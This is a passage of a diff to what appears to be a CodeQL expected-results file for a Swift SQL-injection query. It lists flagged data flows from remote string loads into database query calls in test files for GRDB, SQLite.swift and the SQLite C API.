depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | edges | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | provenance | | | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | provenance | | @@ -366,3 +252,117 @@ nodes | sqlite3_c_api.swift:202:31:202:31 | buffer | semmle.label | buffer | | sqlite3_c_api.swift:210:31:210:31 | buffer | semmle.label | buffer | subpaths +#select +| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to 